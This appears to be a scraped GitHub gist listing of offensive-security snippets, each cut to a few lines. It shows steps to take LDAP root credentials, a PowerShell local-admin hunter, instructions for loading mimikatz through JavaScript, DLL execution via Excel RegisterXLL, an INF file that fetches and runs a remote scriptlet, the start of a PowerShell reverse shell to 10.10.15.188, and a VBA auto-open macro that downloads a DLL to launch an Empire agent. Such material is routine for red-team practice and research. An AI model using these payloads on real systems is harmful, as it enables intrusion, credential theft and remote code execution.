0 0 * * 0 docker compose -f /opt/docker/nginx/docker-compose-le.yaml up && docker exec nginx-service nginx -s reload
gattacker
/ crontab.md
Created
November 18, 2023 14:07
— forked from QNimbus/crontab.md
Docker + Nginx reverse proxy + LetsEncrypt + Chisel
gattacker
/ Open LDAP change Admin password
Created
October 14, 2023 06:14
— forked from arnathan2k/Open LDAP change Admin password
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Find slapd | |
| >> locate slapd | |
| 2. Find user activity in slapd.log | |
| >> grep -i username101 slapd.log | |
| 3. Get the Root Credentials |
gattacker
/ Find-PSRemotingLocalAdminAccess.ps1
Created
September 20, 2022 17:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Find-PSRemotingLocalAdminAccess | |
| { | |
| <# | |
| .SYNOPSIS | |
| Use this script to search for local admin access on machines in a domain or local network. | |
| .DESCRIPTION | |
| This function simply runs a PowerShell Remoting command against the sepcified list of computers. Since, by-default, | |
| we need local administrative access on a computer to run WMI commands, a success for this fucntions | |
| means local administrative access. |
gattacker
/ Instructions-to-mimikatz-js.txt
Created
November 25, 2019 10:46
— forked from pljoel/Instructions-to-mimikatz-js.txt
mimikatz 2.1.1 in javascript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| It is basically a wrap of the following projects: | |
| - mimikatz (https://github.com/gentilkiwi/mimikatz) | |
| - mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7) | |
| Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863) | |
| - DotNetToJScript (https://github.com/tyranid/DotNetToJScript) | |
| INSTRUCTIONS: | |
| 1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
| 2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though) | |
| b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it |
gattacker
/ Steps.txt
Created
November 25, 2019 10:45
— forked from med0x2e/Steps.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
| 2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a | |
| 3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code. | |
| 4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file. | |
| 6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs" | |
gattacker
/ AV2019.txt
Created
November 22, 2019 12:44
— forked from v-p-b/AV2019.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://seclists.org/fulldisclosure/2019/Aug/1 | |
| https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67 | |
| https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/ | |
| https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM | |
| https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM | |
| https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM | |
| http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html | |
| https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968 | |
| https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6 | |
| https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html |
gattacker
/ ExcelXLL.md
Created
November 4, 2019 08:21
— forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
gattacker
/ ieuinit.inf
Created
August 24, 2019 22:12
— forked from bohops/ieuinit.inf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| signature="$CHICAGO$" | |
| AdvancedINF=2.0 | |
| [DefaultInstall.Windows7] | |
| UnRegisterOCXs=FunRun | |
| [FunRun] | |
| %11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('10.10.15.188', 4438); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
gattacker
/ Empire_via_rundll-powershdll.vba
Created
June 10, 2019 12:30
— forked from vivami/Empire_via_rundll-powershdll.vba
VBA macro executing Empire Agent using PowerShdll via rundll
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub AutoOpen() | |
| Debugging | |
| End Sub | |
| Sub Document_Open() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| DownloadDLL |
NewerOlder